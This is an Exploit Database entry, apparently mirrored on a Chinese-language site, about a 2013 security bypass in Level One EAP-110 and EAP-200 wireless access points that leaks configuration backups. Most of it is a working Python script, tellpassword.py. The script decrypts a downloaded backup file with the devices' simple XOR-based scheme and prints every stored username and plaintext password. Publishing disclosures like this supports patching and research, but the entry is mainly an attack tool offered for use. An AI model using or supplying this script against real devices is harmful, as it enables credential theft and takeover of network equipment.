Level One Enterprise Access Point (Multiple Devices) – ‘backupCfg.cgi’ Security Bypass

• Exploit Database
• 27 阅读

• 作者： Richard Weinberger
  日期： 2013-10-15
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/38804/

• source: https://www.securityfocus.com/bid/63168/info
  
  Multiple Level One Enterprise Access Point devices are prone to a security bypass vulnerability.
  
  Successfully exploiting this issue may allow an attacker to gain access to sensitive configuration information including credentials. This may aid in further attacks.
  
  Level One EAP-110 and EAP-200 running firmware 2.00.03 build 1.50-1.5045 are vulnerable; other versions may also be affected. 
  
  # tellpassword.py
  #
  # Extracts user accounts from Level1 (ip4net)
  # EAP-200 (and other) Wifi Access Points
  #
  # (c) 2013 sigma star gmbh
  
  import sys, re
  
  attribRegex = re.compile(r"(\w+)=\"([^\"]*)\"")
  
  if (len(sys.argv) != 2):
  print "USAGE: %s config-backup.conf" % sys.argv[0]
  exit(1)
  
  # decrypt config
  encrypted = open(sys.argv[1], 'rb')
  plain = open('plain.xml', 'w')
  cntr = 0
  encrypted.seek(128)
  byte = encrypted.read(1)
  print "Decrypting config file into plain.xml"
  while byte:
  plainOrd = ((ord(byte) ^ 0xff) + cntr) % 0x80
  plain.write(chr(plainOrd))
  cntr = (cntr + 1) % 0x40
  byte = encrypted.read(1)
  encrypted.close()
  plain.close()
  
  # find user accounts
  print "Parsing accounts..."
  plain = open('plain.xml', 'r')
  for line in plain:
  if "<user" in line:
  user = None
  password = None
  for match in attribRegex.finditer(line):
  attrib = match.group(1)
  if attrib == "name":
  user = match.group(2)
  elif attrib == "password":
  password = match.group(2)
  if len(password) > 0:
  print " - %s: %s" % (user, password)
  plain.close()